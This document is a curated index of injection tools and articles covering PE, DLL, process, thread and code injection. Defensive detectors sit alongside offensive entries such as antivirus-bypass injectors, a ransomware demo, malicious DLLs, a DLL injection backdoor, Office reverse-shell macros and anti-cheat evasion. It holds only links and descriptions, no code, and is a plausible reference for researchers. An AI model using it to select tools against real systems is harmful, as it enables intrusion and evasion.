NSGenCS(https://shells.systems/the-birth-of-nsgencs/)
Injection
- PE Injection、DLL Injection、Process Injection、Thread Injection、Code Injection、Shellcode Injection、ELF Injection、Dylib Injection, including 400+Tools and 350+posts
Directory
- PE Injection -> (9)Tools (6)Post
- DLL Injection
- Process Injection -> (48)Tools (92)Post
- Thread Injection -> (1)Tools (9)Post
- Code Injection -> (47)Tools (143)Post
- Shellcode Injection -> (13)Tools (26)Post
- ELF Injection -> (7)Tools (8)Post
- Dylib Injection -> (5)Tools (1)Post
- Android -> (21)Tools (10)Post
- Other -> (190)Tools (2)Post
PE Injection
Tools
- [535Star][20d] [C] jondonym/peinjector peinjector - MITM PE file infector
- [407Star][5m] [Assembly] hasherezade/pe_to_shellcode Converts PE into a shellcode
- [230Star][3y] [C++] secrary/infectpe Inject custom code into PE file [This project is not maintained anymore]
- [220Star][2y] [C++] bromiumlabs/packerattacker C++ application that uses memory and code hooks to detect packers
- [196Star][30d] [Py] antonin-deniau/cave_miner Search for code cave in all binaries
- [126Star][3y] [C++] gpoulios/ropinjector Patching ROP-encoded shellcodes into PEs
- [119Star][16d] [C] hasherezade/chimera_pe ChimeraPE (a PE injector type - alternative to: RunPE, ReflectiveLoader, etc) - a template for manual loading of EXE, loading imports payload-side
- [119Star][16d] [C] hasherezade/chimera_pe ChimeraPE (a PE injector type - alternative to: RunPE, ReflectiveLoader, etc) - a template for manual loading of EXE, loading imports payload-side
- [18Star][2y] [Py] ohjeongwook/srdi
Post
- 2019.01 [fuzzysecurity] Powershell PE Injection: This is not the Calc you are looking for!
- 2018.09 [andreafortuna] Some thoughts about PE Injection
- 2015.09 [n0where] MITM PE file infector: PEInjector
- 2014.04 [sevagas] PE injection explained
- 2011.04 [codereversing] Writing a File Infector/Encrypter: PE File Modification/Section Injection (2/4)
DLL Injection
Collection
- [85Star][3y] [C++] benjaminsoelberg/reflectivepeloader Reflective PE loader for DLL injection
Tools
- [1121Star][7y] [C] stephenfewer/reflectivedllinjection Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
- [1093Star][11d] [C] fdiskyou/injectallthethings Seven different DLL injection techniques in one single project.
- [747Star][10m] [C++] darthton/xenos Windows dll injector
- [635Star][7m] [PS] monoxgas/srdi Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode
- [489Star][4m] [C#] akaion/bleak A Windows native DLL injection library that supports several methods of injection.
- [385Star][14d] [C++] opensecurityresearch/dllinjector dll injection tool that implements various methods
- [382Star][13d] [C] wbenny/injdrv proof-of-concept Windows Driver for injecting DLL into user-mode processes using APC
- [277Star][2y] [C++] gellin/teamviewer_permissions_hook_v1 A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions.
- [268Star][3y] [C++] professor-plum/reflective-driver-loader injection technique base off Reflective DLL injection
- [227Star][10d] [C++] wunkolo/uwpdumper DLL and Injector for dumping UWP applications at run-time to bypass encrypted file system protection.
- [197Star][2y] [C] sud01oo/processinjection Some ways to inject a DLL into a alive process
- [190Star][10d] [C++] hzphreak/vminjector DLL Injection tool to unlock guest VMs
- [185Star][19d] [C++] jonatan1024/clrinject 将 C#EXE 或 DLL 程序集注入任意CLR 运行时或者其他进程的 AppDomain
- [178Star][1m] [Py] infodox/python-dll-injection Python toolkit for injecting DLL files into running processes on Windows
- [177Star][11m] [C++] strivexjun/driverinjectdll Using Driver Global Injection dll, it can hide DLL modules
- [146Star][4y] [C] dismantl/improvedreflectivedllinjection An improvement of the original reflective DLL injection technique by Stephen Fewer of Harmony Security
- [113Star][2m] [C] rsmusllp/syringe A General Purpose DLL & Code Injection Utility
- [110Star][7y] [C++] abhisek/pe-loader-sample Proof of concept implementation of in-memory PE Loader based on ReflectiveDLLInjection Technique
- [87Star][2m] [C] countercept/doublepulsar-usermode-injector A utility to use the usermode shellcode from the DOUBLEPULSAR payload to reflectively load an arbitrary DLL into another process, for use in testing detection techniques or other security research.
- [86Star][3y] [C] zerosum0x0/threadcontinue Reflective DLL injection using SetThreadContext() and NtContinue()
- [82Star][6m] [C++] nefarius/injector Command line utility to inject and eject DLLs
- [73Star][4m] [C] danielkrupinski/memject Simple Dll injector loading from memory. Supports PE header and entry point erasure. Written in C99.
- [62Star][15d] [Py] psychomario/pyinject A python module to help inject shellcode/DLLs into windows processes
- [61Star][3y] [C] arvanaghi/windows-dll-injector A basic Windows DLL injector in C using CreateRemoteThread and LoadLibrary. Implemented for educational purposes.
- [59Star][3y] [C++] azerg/remote_dll_injector Stealth DLL injector
- [56Star][1y] [C] rapid7/reflectivedllinjection Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
- [53Star][5m] [C] adrianyy/keinject Kernel LdrLoadDll injector
- [52Star][5m] [C] nccgroup/ncloader A session-0 capable dll injection utility
- [52Star][3y] [C++] zer0mem0ry/standardinjection A simple Dll Injection demonstration
- [51Star][19d] [C++] papadp/reflective-injection-detection a program to detect reflective dll injection on a live machine
- [50Star][1y] [C] realoriginal/reflective-rewrite Attempt to rewrite StephenFewers Reflective DLL Injection to make it a little more stealthy. Some code taken from Meterpreter & sRDI. Currently a work in progress.
- [49Star][3y] [C++] zodiacon/dllinjectionwiththreadcontext This is a sample that shows how to leverage SetThreadContext for DLL injection
- [42Star][3y] [C++] zer0mem0ry/manualmap A Simple demonstration of manual dll injector
- [38Star][26d] [C++] rolfrolles/wbdeshook DLL-injection based solution to Brecht Wyseur’s wbDES challenge (based on SysK’s Phrack article)
- [38Star][2m] [Assembly] danielkrupinski/inflame User-mode Windows DLL injector written in Assembly language (FASM syntax) with WinAPI.
- [37Star][4m] [C++] nanoric/pkn core of pkn game hacking project. Including mainly for process management, memory management, and DLL injecttion. Also PE analysis, windows registry management, compile-time sting encryption, byte-code emulator, etc. Most of them can run under kernel mode.
- [36Star][7m] [C++] blole/injectory command-line interface dll injector
- [33Star][3m] [C++] notscimmy/libinject Currently supports injecting signed/unsigned DLLs in 64-bit processes
- [31Star][4m] [Py] fullshade/poppopret-nullbyte-dll-bypass A method to bypass a null byte in a POP-POP-RETN address for exploiting local SEH overflows via DLL injection
- [30Star][6m] [C++] psmitty7373/eif Evil Reflective DLL Injection Finder
- [29Star][4m] [C++] m-r-j-o-h-n/swh-injector An Injector that can inject dll into game process protected by anti cheat using SetWindowsHookEx.
- [29Star][4y] [C++] stormshield/beholder-win32 A sample on how to inject a DLL from a kernel driver
- [28Star][4m] [Py] fullshade/py-memject A Windows .DLL injector written in Python
- [27Star][6m] [HTML] flyrabbit/winproject Hook, DLLInject, PE_Tool
- [27Star][4m] [C] ice3man543/zeusinjector An Open Source Windows DLL Injector With All Known Techniques Available
- [27Star][5y] [C] olsut/kinject-x64 Kinject - kernel dll injector, currently available in x86 version, will be updated to x64 soon.
- [27Star][5m] [C] sqdwr/loadimageinject LoadImage Routine Inject Dll
- [25Star][1y] [C#] enkomio/managedinjector A C# DLL injection library
- [25Star][6y] [C] whyallyn/paythepony Pay the Pony is hilarityware that uses the Reflective DLL injection library to inject into a remote process, encrypt and demand a ransom for files, and inflict My Little Pony madness on a system.
- [24Star][2m] [C#] tmthrgd/dll-injector Inject and detour DLLs and program functions both managed and unmanaged in other programs, written (almost) purely in C#. [Not maintained].
- [21Star][3y] [C] al-homedawy/injector A Windows driver used to facilitate DLL injection
- [21Star][5y] [C] nyx0/dll-inj3cti0n Another dll injection tool.
- [21Star][29d] [C++] coreyauger/slimhook Demonstration of dll injection. As well loading .net runtime and calling .net code. Example hijacking d3d9 dll and altering rendering of games.
- [17Star][12m] [C] strobejb/injdll DLL Injection commandline utility
- [17Star][5m] [C#] cameronaavik/ilject Provides a way which you can load a .NET dll/exe from disk, modify/inject IL, and then run the assembly all in memory without modifying the file.
- [15Star][2y] [C] ntraiseharderror/phage Reflective DLL Injection style process infector
- [15Star][3y] [C] portcullislabs/wxpolicyenforcer Injectable Windows DLL which enforces a W^X memory policy on a process
- [14Star][4m] [C#] ulysseswu/vinjex A simple DLL injection lib using Easyhook, inspired by VInj.
- [13Star][1y] [C++] matrix86/wincodeinjection Dll Injection and Code injection sample
- [13Star][4y] [C++] spl0i7/dllinject Mineweeper bot by DLL Injection
- [12Star][4m] [C++] sherazibrahim/dll-injector I created a dll injector I am going to Open source its Code. But remember one thing that is any one can use it only for Educational purpose .I again say do not use it to damage anyone’s Computer.But one thing if you are using it for some good purpose like to help someone who really need help then I permit you to use it.
- [11Star][9m] [C#] ihack4falafel/dll-injection C# program that takes process id and path to DLL payload to perform DLL injection method.
- [9Star][18d] [C++] pfussell/pivotal A MITM proxy server for reflective DLL injection through WinINet
- [9Star][9m] [C] userexistserror/injectdll Inject a Dll from memory
- [9Star][1y] [Assembly] dentrax/dll-injection-with-assembly DLL Injection to Exe with Assembly using OllyDbg
- [7Star][1y] [C] haidragon/newinjectdrv APC注入DLL内核层
- [6Star][2y] thesph1nx/covenant Metepreter clone - DLL Injection Backdoor
- [5Star][5y] [C++] ciantic/remotethreader Helps you to inject your dll in another process
- [5Star][4m] [C++] reclassnet/reclass.net-memorypipeplugin A ReClass.NET plugin which allows direct memory access via dll injection.
- [1Star][1y] [PS] getrektboy724/maldll A bunch of malicius dll to inject to a process
Post
- 2020.02 [0x00sec] DLL injections (safety)
- 2019.08 [tyranidslair] Windows Code Injection: Bypassing CIG Through KnownDlls
- 2019.08 [tyranidslair] Windows Code Injection: Bypassing CIG Through KnownDlls
- 2019.03 [code610] DLL Injection - part 2
- 2018.10 [0x00sec] Reflective Dll Injection - Any Way to check If a process is already injected?
- 2018.09 [code610] DLL Injection - part 1
- 2018.08 [vkremez] Let’s Learn: Dissecting Panda Banker & Modules: Webinject, Grabber & Keylogger DLL Modules
- 2018.06 [0x00sec] Reflective DLL Injection - AV detects at runtime
- 2017.08 [silentbreaksecurity] sRDI – Shellcode Reflective DLL Injection
- 2017.07 [0x00sec] Reflective DLL Injection
- 2017.07 [zerosum0x0] ThreadContinue - Reflective DLL Injection Using SetThreadContext() and NtContinue()
- 2017.07 [zerosum0x0] Proposed Windows 10 EAF/EMET “Bypass” for Reflective DLL Injection
- 2017.05 [lallouslab] 7 DLL injection techniques in Microsoft Windows
- 2017.05 [3or] mimilib DHCP Server Callout DLL injection
- 2017.05 [3or] Hunting DNS Server Level Plugin dll injection
- 2017.04 [arvanaghi] DLL Injection Using LoadLibrary in C
- 2017.04 [bogner] CVE-2017-3511: Code Injection through DLL Sideloading in 64bit Oracle Java
- 2017.04 [countercept] Analyzing the DOUBLEPULSAR Kernel DLL Injection Technique
- 2017.04 [countercept] Analyzing the DOUBLEPULSAR Kernel DLL Injection Technique
- 2017.04 [pentestlab] DLL Injection
- 2016.06 [lowleveldesign] !injectdll – a remote thread approach
- 2016.06 [lowleveldesign] !injectdll – a WinDbg extension for DLL injection
- 2016.04 [ketansingh] Hacking games with DLL Injection
- 2015.11 [modexp] DLL/PIC Injection on Windows from Wow64 process
- 2015.08 [rapid7] Using Reflective DLL Injection to exploit IE Elevation Policies
- 2015.05 [codereversing] Debugging Injected DLLs
- 2015.05 [WarrantyVoider] DAI dll injection test - successfull
- 2015.04 [securestate] DLL Injection Part 2: CreateRemoteThread and More
- 2015.03 [securestate] DLL Injection Part 1: SetWindowsHookEx
- 2015.03 [securestate] DLL Injection Part 0: Understanding DLL Usage
- 2014.10 [codingvision] C# Inject a Dll into a Process (w/ CreateRemoteThread)
- 2014.03 [trustwave] Old School Code Injection in an ATM .dll
- 2014.01 [osandamalith] Ophcrack Path Subversion Arbitrary DLL Injection Code Execution
- 2013.09 [debasish] Inline API Hooking using DLL Injection
- 2013.06 [msreverseengineering] What is DLL Injection and How is it used for Reverse Engineering?
- 2012.10 [octopuslabs] DLL Injection – A Splash Bitmap
- 2012.09 [debasish] KeyLogging through DLL Injection[The Simplest Way]
- 2012.09 [volatility] MoVP 2.1 Atoms (The New Mutex), Classes and DLL Injection
- 2012.05 [brindi] DLL and Code Injection in Python
- 2008.11 [sans] Finding stealth injected DLLs
Process Injection
Tools
- [2389Star][10d] [Py] lmacken/pyrasite Inject code into running Python processes
- [1568Star][17d] [Py] google/pyringe Debugger capable of attaching to and injecting code into python processes.
- [1486Star][3m] [C] rikkaapps/riru Inject zygote process by replace libmemtrack
- [899Star][1y] [C++] secrary/injectproc Process Injection Techniques [This project is not maintained anymore]
- [655Star][4y] [C] rentzsch/mach_inject interprocess code injection for Mac OS X
- [589Star][14d] [C] gaffe23/linux-inject Tool for injecting a shared object into a Linux process
- [536Star][13d] [C] odzhan/injection Windows process injection methods
- [435Star][11d] [Py] davidbuchanan314/dlinject Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace
- [413Star][4y] [C#] zenlulz/memorysharp A C# based memory editing library targeting Windows applications, offering various functions to extract and inject data and codes into remote processes to allow interoperability.
- [381Star][14d] [C++] evilsocket/arminject An application to dynamically inject a shared object into a running process on ARM architectures.
- [376Star][12d] [C++] theevilbit/injection various process injection technique
- [363Star][4m] [C++] safebreach-labs/pinjectra Pinjectra is a C/C++ OOP-like library that implements Process Injection techniques (with focus on Windows 10 64-bit)
- [362Star][4m] [C#] rasta-mouse/tikitorch Process Injection
- [294Star][26d] [C] quarkslab/quarkspwdump Dump various types of Windows credentials without injecting in any process.
- [267Star][2y] [C++] chadski/sharpneedle Inject C# code into a running process
- [246Star][16d] [C] suvllian/process-inject 在Windows环境下的进程注入方法:远程线程注入、创建进程挂起注入、反射注入、APCInject、SetWindowHookEX注入
- [204Star][4y] [C] dismantl/linux-injector Utility for injecting executable code into a running process on x86/x64 Linux
- [163Star][1m] [C] dhavalkapil/libdheap A shared (dynamic) library that can be transparently injected into different processes to detect memory corruption in glibc heap
- [157Star][9m] [C] hasherezade/process_doppelganging 进程注入技术 Process Doppelganging 的实现代码
- [154Star][1m] [C] ixty/mandibule 向远程进程注入ELF文件
- [144Star][4m] [PS] empireproject/psinject Inject PowerShell into any process
- [142Star][4m] [C#] 3xpl01tc0d3r/processinjection This program is designed to demonstrate various process injection techniques
- [142Star][4m] [C] antoniococo/mapping-injection Just another Windows Process Injection
- [126Star][8d] [C++] ez8-co/yapi fusion injector that reduce differences between x64, wow64 and x86 processes
- [111Star][5m] [C++] arno0x/tcprelayinjecter Tool for injecting a “TCP Relay” managed assembly into unmanaged processes
- [110Star][16d] [Shell] aoncyberlabs/cexigua Linux based inter-process code injection without ptrace(2)
- [85Star][1m] [C] elfmaster/saruman ELF anti-forensics exec, for injecting full dynamic executables into process image (With thread injection)
- [76Star][5y] [C++] malwaretech/zombifyprocess Inject code into a legitimate process
- [62Star][8m] [C] kubo/injector Library for injecting a shared library into a Linux or Windows process
- [59Star][4y] [C] infosecguerrilla/reflectivesoinjection Reflective SO injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
- [53Star][1m] [Py] xiphosresearch/steelcon-python-injection Python Process Injection PoC Code from my SteelCon talk in 2014
- [52Star][6y] [C++] georgenicolaou/heaveninjector Simple proof of concept code for injecting libraries on 64bit processes from a 32bit process
- [47Star][7m] [PS] 3gstudent/code-execution-and-process-injection Powershell to CodeExecution and ProcessInjection
- [46Star][5y] [C++] tandasat/remotewritemonitor A tool to help malware analysts tell that the sample is injecting code into other process.
- [37Star][4m] [C] egguncle/ptraceinject 进程注入
- [31Star][25d] [ObjC] cwbudde/cordova-plugin-wkwebview-inject-cookie Injects a cookie in order to start the sync processs with wkWebView
- [30Star][2y] [C++] ntraiseharderror/unrunpe PoC for detecting and dumping process hollowing code injection
- [30Star][4m] [C#] mr-un1k0d3r/remoteprocessinjection C# remote process injection utility for Cobalt Strike
- [16Star][2y] [C++] xfgryujk/injectexe Inject the whole exe into another process
- [16Star][1m] [C] narhen/procjack PoC of injecting code into a running Linux process
- [14Star][24d] [C++] eternityx/zinjector zInjector is a simple tool for injecting dynamic link libraries into arbitrary processes
- [10Star][2m] [JS] lmangani/node_ssl_logger Decrypt and log process SSL traffic via Frida Injection
- [10Star][1y] [C++] shaxzy/vibranceinjector Mono process injector
- [8Star][5y] [C++] hkhk366/memory_codes_injection Inject codes to another process to watch and operate other process. This is usually used as anti-virus software.
- [6Star][2m] [ObjC] couleeapps/mach_inject_32 Inject libraries into 32 processes on macOS Mojave
- [6Star][3m] [Jupyter Notebook] jsecurity101/detecting-process-injection-techniques This is a repository that is meant to hold detections for various process injection techniques.
- [1Star][2y] [C++] malwaresec/processinjection Repo for process injection source files
- [NoneStar][C] realoriginal/ppdump-public Protected Process (Light) Dump: Uses Zemana AntiMalware Engine To Open a Privileged Handle to a PP/PPL Process And Inject MiniDumpWriteDump() Shellcode
Post
- 2020.04 [infosecinstitute] MITRE ATT&CK spotlight: Process injection
- 2020.03 [jsecurity101] Engineering Process Injection Detections -
- 2020.02 [vkremez] Let’s Learn: Inside Parallax RAT Malware: Process Hollowing Injection & Process Doppelgänging API Mix: Part I
- 2020.01 [BlackHat] Process Injection Techniques - Gotta Catch Them All
- 2020.01 [hakin9] Mapping-Injection: Just another Windows Process Injection
- 2019.12 [HackersOnBoard] DEF CON 27 - Itzik Kotler - Process Injection Techniques Gotta Catch Them All
- 2019.10 [Cooper] Fileless Malware Infection And Linux Process Injection In Linux OS - Hendrik Adrian
- 2019.09 [sevagas] Process PE Injection Basics
- 2019.08 [cobaltstrike] Cobalt Strike’s Process Injection: The Details
- 2019.07 [fortinet] A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection
- 2019.04 [OALabs] Reverse Engineering Quick Tip - Unpacking Process Injection With a Single Breakpoint
- 2018.11 [googleprojectzero] Injecting Code into Windows Protected Processes using COM - Part 2
- 2018.11 [andreafortuna] Process Injection and Persistence using Application Shimming
- 2018.10 [googleprojectzero] Injecting Code into Windows Protected Processes using COM - Part 1
- 2018.07 [malcomvetter] .NET Process Injection
- 2018.02 [endgame] Stopping Olympic Destroyer: New Process Injection Insights
- 2018.01 [vkremez] Let’s Learn: Dissect Panda Banking Malware’s “libinject” Process Injection Module
- 2017.11 [fireeye] Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection
- 2017.11 [OALabs] Unpacking Process Injection Malware With IDA PRO (Part 2)
- 2017.11 [OALabs] Unpacking Process Injection Malware With IDA PRO (Part 1)
- 2017.10 [securityintelligence] Diving Into Zberp’s Unconventional Process Injection Technique
- 2017.09 [gdssecurity] Linux based inter-process code injection without ptrace(2)
- 2017.07 [endgame] Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques
- 2017.07 [vulnerablelife] Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques
- 2017.07 [microsoft] Detecting stealthier cross-process injection techniques with Windows Defender ATP: Process hollowing and atom bombing
- 2017.07 [struppigel] Process Injection Info Graphic
- 2017.05 [MalwareAnalysisForHedgehogs] Malware Analysis - Code Injection via CreateRemoteThread & WriteProcessMemory
- 2017.03 [microsoft] Uncovering cross-process injection with Windows Defender ATP
- 2015.08 [christophertruncer] Injecting Shellcode into a Remote Process with Python
- 2015.08 [securestate] Injecting Python Code Into Native Processes
- 2015.08 [securestate] Injecting Python Code Into Native Processes
- 2015.05 [redcanary] What Red Canary Detects: Spotlight on Process Injection
- 2014.06 [lastline] Dissecting Payload Injection Using LLama Process Snapshots
- 2014.05 [talosintelligence] Betabot Process Injection
- 2012.04 [dreamofareverseengineer] Identifying malicious injected code in Legit Process through dynamic analysis:
- 2011.07 [firebitsbr] Syringe utility provides ability to inject shellcode into processes
- 2010.08 [console] Bypassing AntiVirus With Process Injection
Thread Injection
Tools
- [49Star][2y] [C] vallejocc/poc-inject-data-wm_copydata A tiny PoC to inject and execute code into explorer.exe with WM_SETTEXT+WM_COPYDATA+SetThreadContext
Post
- 2020.03 [trustedsec] Avoiding Get-InjectedThread for Internal Thread Creation
- 2018.04 [xpnsec] Understanding and Evading Get-InjectedThread
- 2014.06 [dreamofareverseengineer] Monitoring Thread Injection
Code Injection
Tools
- [6260Star][10d] [ObjC] johnno1962/injectionforxcode Runtime Code Injection for Objective-C & Swift
- [2386Star][2y] [Py] danmcinerney/lans.py Inject code and spy on wifi users
- [1685Star][11d] [Py] epinna/tplmap Server-Side Template Injection and Code Injection Detection and Exploitation Tool
- [1470Star][4m] [Swift] johnno1962/injectioniii Re-write of Injection for Xcode in (mostly) Swift4
- [1112Star][14d] [ObjC] dyci/dyci-main Dynamic Code Injection Tool for Objective-C
- [983Star][3y] [C] cybellum/doubleagent Zero-Day Code Injection and Persistence Technique
- [614Star][16d] [C++] breakingmalwareresearch/atom-bombing Brand New Code Injection for Windows
- [265Star][5y] [C++] breakingmalware/powerloaderex Advanced Code Injection Technique for x32 / x64
- [249Star][8y] rentzsch/mach_star code injection and function overriding for Mac OS X
- [228Star][12d] [C++] marcosd4h/memhunter Live hunting of code injection techniques
- [214Star][17d] [C] peperunas/injectopi A set of tutorials about code injection for Windows.
- [186Star][7m] [ObjC] nakiostudio/twitterx Keeping Twitter for macOS alive with code injection
- [170Star][2y] [Py] undeadsec/debinject Inject malicious code into *.debs
- [116Star][22d] [C#] p0cl4bs/hanzoinjection injecting arbitrary codes in memory to bypass common antivirus solutions
- [91Star][2m] [Py] hackatnow/cromos Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application.
- [90Star][4y] [Java] zerothoughts/spring-jndi Proof of concept exploit, showing how to do bytecode injection through untrusted deserialization with Spring Framework 4.2.4
- [66Star][2y] [Java] sola-da/synode Automatically Preventing Code Injection Attacks on Node.js
- [65Star][3y] [Py] sethsec/pycodeinjection Automated Python Code Injection Tool
- [65Star][3m] [Py] tbarabosch/quincy 在内存转储中检测基于主机的代码注入攻击
- [49Star][2m] [C#] guibacellar/dnci DNCI - Dot Net Code Injector
- [48Star][3y] [C++] tonyzesto/pubgprivxcode85 Player ESP 3D Box ESP Nametag ESP Lightweight Code Secure Injection Dedicated Cheat Launcher Secured Against Battleye Chicken Dinner Every Day. Win more matches than ever before with CheatAutomation’s Playerunknown’s Battlegrounds cheat! Our stripped down, ESP only cheat gives you the key features you need to take out your opponents and be eatin…
- [47Star][1y] [C] yifanlu/3ds_injector Open source implementation of loader module with code injection support
- [46Star][7m] [C] rodionovd/task_vaccine Yet another code injection library for OS X
- [37Star][2m] [C] sduverger/ld-shatner ld-linux code injector
- [34Star][2y] [C++] ntraiseharderror/dreadnought PoC for detecting and dumping code injection (built and extended on UnRunPE)
- [27Star][4y] [Java] zerothoughts/jndipoc Proof of concept showing how java byte code can be injected through InitialContext.lookup() calls
- [27Star][6m] [Java] dinject/dinject Dependency injection via APT (source code generation) ala “Server side Dagger DI”
- [25Star][7m] [Py] batteryshark/miasma Cross-Platform Binary OTF Patcher, Code Injector, Hacking Utility
- [25Star][3y] [C++] hatriot/delayloadinject Code injection via delay load libraries
- [20Star][2y] [c] odzhan/propagate PROPagate code injection technique example
- [19Star][3y] [Swift] depoon/injectiblelocationspoofing Location Spoofing codes for iOS Apps via Code Injection
- [18Star][6y] [ObjC] mhenr18/injector Code injection + payload communications for OSX (incl. sandboxed apps)
- [17Star][2m] [C++] sunsided/native-dotnet-code-injection Injection of managed code into non-managed Windows applications
- [14Star][2m] [C#] gerich-home/lua-inject Inject any C# code into programs with lua
- [13Star][3y] [C] tbarabosch/1001-injects Tiny research project to understand code injections on Linux based systems
- [13Star][3m] [C++] revsic/codeinjection Code Injection technique written in cpp language
- [11Star][2y] [C] gdbinit/calcspace Small util to calculate available free space in mach-o binaries for code injection
- [11Star][7y] [C#] yifanlu/vitainjector Inject userland ARM code through PSM
- [9Star][19d] [Py] bao7uo/waf-cookie-fetcher WAF Cookie Fetcher is a Burp Suite extension written in Python, which uses a headless browser to obtain the values of WAF-injected cookies which are calculated in the browser by client-side JavaScript code and adds them to Burp’s cookie jar. Requires PhantomJS.
- [9Star][6m] [Py] mpgn/cve-2018-16341 CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
- [7Star][2y] [PHP] jpapayan/aspis A PHP code transformer to provide protection against injection attacks
- [6Star][2y] [Py] andreafortuna/pycodeinjector Python code injection library
- [4Star][1y] [Java] righettod/injection-cheat-sheets Provide some tips to handle Injection into application code (OWASP TOP 10 - A1).
- [2Star][2y] [Standard ML] 11digits/php-clean-malware Simple PHP code to assist in cleaning of injected malware PHP code
- [2Star][9m] [C++] thepwnrip/code-injection A collection of methods of Code Injection on Windows
- [1Star][1y] [C++] smore007/remote-iat-hook Remote IAT hook example. Useful for code injection
- [NoneStar][Py] thelinuxchoice/eviloffice Inject Macro and DDE code into Excel and Word documents (reverse shell)
Post
- 2020.05 [hexacorn] New Code Injection/Execution – Marsh…mellow
- 2020.04 [hexacorn] Code Injection everyone forgets about
- 2020.03 [WHIDInjector] Remotely Injecting Keystrokes through an Industrial Barcode
- 2020.01 [hakin9] Memhunter - Live Hunting Of Code Injection Techniques
- 2020.01 [WarrantyVoider] RE with WV - Episode #7 Binary Editing and Code Injection
- 2019.12 [HackersOnBoard] DEF CON 27 - Alon Weinberg - Please Inject Me a x64 Code Injection
- 2019.12 [sevagas] Code Injection - Exploit WNF callback
- 2019.12 [sevagas] Code Injection - Disable Dynamic Code Mitigation (ACG)
- 2019.11 [ojasookert] Macy’s, Magecart, Black Friday, and JavaScript Code Injection
- 2019.10 [talosintelligence] YouPHPTube Encoder base64Url multiple command injections
- 2019.09 [netsparker] What is Code Injection and How to Avoid It
- 2019.08 [bugbountywriteup] When i found php code injection
- 2019.07 [bromium] Dridex’s Bag of Tricks: An Analysis of its Masquerading and Code Injection Techniques
- 2019.06 [pewpewthespells] Blocking Code Injection on iOS and OS X
- 2019.05 [hexacorn] ‘Plata o plomo’ code injections/execution tricks
- 2019.05 [HackerSploit] Bug Bounty Hunting - PHP Code Injection
- 2019.04 [hexacorn] SHLoadInProc – The Non-Working Code Injection trick from the past
- 2019.04 [hexacorn] Listplanting – yet another code injection trick
- 2019.04 [hexacorn] 3 new code injection tricks
- 2019.04 [hexacorn] Treepoline – new code injection technique
- 2019.04 [hexacorn] WordWarper – new code injection trick
- 2019.04 [JosephDelgadillo] Learn System Hacking E6: PHP Code Injection
- 2019.03 [aditya12anand] How to write secure code against injection attacks?
- 2019.03 [andreafortuna] A simple Windows code Injection example written in C#
-
2018.10 [MSbluehat] [BlueHat v18 Memory resident implants - code injection is alive and well](https://www.slideshare.net/MSbluehat/bluehat-v18-memory-resident-implants-code-injection-is-alive-and-well) - 2018.09 [ironcastle] More Excel DDE Code Injection, (Fri, Sep 28th)
- 2018.09 [sans] More Excel DDE Code Injection
- 2018.09 [bugbountywriteup] Injecting tourism website running codeigniter
- 2018.08 [andreafortuna] pycodeinjector: a simple python Code Injection library
- 2018.08 [trustedsec] Breaking Down the PROPagate Code Injection Attack
- 2018.08 [andreafortuna] Code injection on Windows using Python: a simple example
- 2018.06 [bishopfox] Server-Side Spreadsheet Injection – Formula Injection to Remote Code Execution
- 2018.01 [doyler] Nodejs Code Injection (EverSec CTF – BSides Raleigh 2017)
- 2018.01 [oherrala] Using static typing to protect against code injection attacks
- 2017.11 [l0wb1tUC] COD WWII Code Injection Fail
- 2017.11 [hexacorn] PROPagate – a new code injection trick – 64-bit and 32-bit
- 2017.10 [hexacorn] PROPagate – a new code injection trick
- 2017.09 [decktonic] How one hacker stole thousands of dollars worth of cryptocurrency with a classic code injection…
- 2017.09 [arxiv] [1709.05690] BabelView: Evaluating the Impact of Code Injection Attacks in Mobile Webviews
- 2017.08 [defencely] Achieving Code Injection on Trendy – Sarahah.com
- 2017.07 [bogner] Code Injection in Slack’s Windows Desktop Client leads to Privilege Escalation
- 2017.06 [trendmicro] Analyzing the Fileless, Code-injecting SOREBRECT Ransomware
- 2017.04 [welivesecurity] Fake Chrome extensions inject code into web pages
- 2017.04 [n0where] Inject Custom Code Into PE File: InfectPE
- 2017.03 [mstajbakhsh] Smali Code Injection: Playing with 2048!
- 2017.03 [HackingMonks] Remote Code Injection on DVWA medium
- 2017.01 [securiteam] SSD Advisory – Icewarp, AfterLogic and MailEnable Code Injection
- 2017.01 [sentinelone] What Is Code Injection?
- 2016.12 [mstajbakhsh] Smali Code Injection
- 2016.12 [tevora] Gaining Code Execution with Injection on Java args
- 2016.11 [doyler] Exploiting Python Code Injection in Web Applications
- 2016.11 [kennethpoon] How to perform iOS Code Injection on .ipa files
- 2016.11 [thembits] Loffice gets a makeover - Gives an insight into antis and detect code injection
- 2016.11 [sethsec] Exploiting Python Code Injection in Web Applications
- 2016.10 [ensilo] AtomBombing: A Code Injection that Bypasses Current Security Solutions
- 2016.10 [insinuator] Linq Injection – From Attacking Filters to Code Execution
- 2016.10 [JackkTutorials] How to perform Remote Code Injection attacks REUPLOADED
- 2016.09 [forcepoint] Highly Evasive Code Injection Awaits User Interaction Before Delivering Malware
- 2016.08 [artsploit] [demo.paypal.com] Node.js code injection (RCE)
- 2016.07 [suchakra] Unravelling Code Injection in Binaries
- 2016.03 [yifan] 3DS Code Injection through “Loader”
- 2015.12 [hexacorn] IME code injection (old)
- 2015.08 [securiteam] SSD Advisory – Symantec NetBackup OpsCenter Server Java Code Injection RCE
- 2015.04 [sensecy] MitM Attacks Pick Up Speed – A Russian Coder Launches a New Web Injection Coding Service
- 2014.10 [arxiv] [1410.7756] Code Injection Attacks on HTML5-based Mobile Apps
- 2014.09 [tribalchicken] Bash bug allows code injection attack
- 2014.09 [digitaloperatives] OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection: Local Use
- 2014.09 [tribalchicken] Bash bug allows code injection attack
- 2013.12 [lowleveldesign] Injecting code into .NET applications
- 2013.11 [imperva] Threat Advisory: A JBoss AS Exploit, Web Shell code Injection.
